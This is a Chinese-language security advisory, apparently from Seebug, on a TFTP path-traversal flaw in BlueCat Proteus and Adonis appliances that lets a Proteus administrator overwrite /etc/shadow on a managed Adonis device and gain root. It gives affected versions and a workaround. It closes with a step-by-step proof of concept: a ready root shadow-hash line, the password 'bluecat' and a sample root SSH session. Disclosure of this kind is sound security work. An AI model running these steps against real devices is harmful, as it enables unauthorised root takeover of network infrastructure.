BlueCat Networks Proteus TFTP文件远程权限提升漏洞

2007-08-08T00:00:00
ID SSV:2073
Type seebug
Reporter Root
Modified 2007-08-08T00:00:00

Description

BUGTRAQ ID: 25214

Proteus是企业级的IP地址管理设备。

Proteus的TFTP服务器实现上存在漏洞,远程攻击者可能利用此漏洞获取服务器的root用户权限。

可以使用Proteus向所管理的Adonis设备上传文件,管理员可以命名TFTP文件,但没有对用户输入(如相对路径)执行数据验证。所上传的文件仅可拷贝到/tftpboot/目录,且文件拷贝是以root用户权限执行的,因此名为../etc/shadow的文件可以覆盖影子口令数据库/etc/shadow。

Bluecat Networks Proteus 2.0.2.0 Bluecat Networks Adonis 5.0.2.8 临时解决方法:

  • 禁止管理员的TFTP访问。

厂商补丁:

Bluecat Networks

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href="http://www.bluecatnetworks.com/" target="_blank">http://www.bluecatnetworks.com/</a>

                                        
                                            
                                                1) 在Proteus配置中创建新的TFTP组
2) 添加TFTP部署角色,指定Adonis设备到组中
3) 在新TFTP组的顶级文件夹,添加名为../etc/shadow的文件并加载包含有以下行的文件:

   root:Im0Zgl8tnEq9Y:13637:0:99999:7:::

4) 向Adonis设备部署配置
5) 现在可以口令bluecat以root权限登录到Adonis设备:

   $ ssh root@192.168.1.11
   root@192.168.1.11's password:
   # cat /etc/shadow
   root:Im0Zgl8tnEq9Y:13637:0:99999:7:::

注释:这个示例假设启用了SSH,iptable允许TCP/22端口。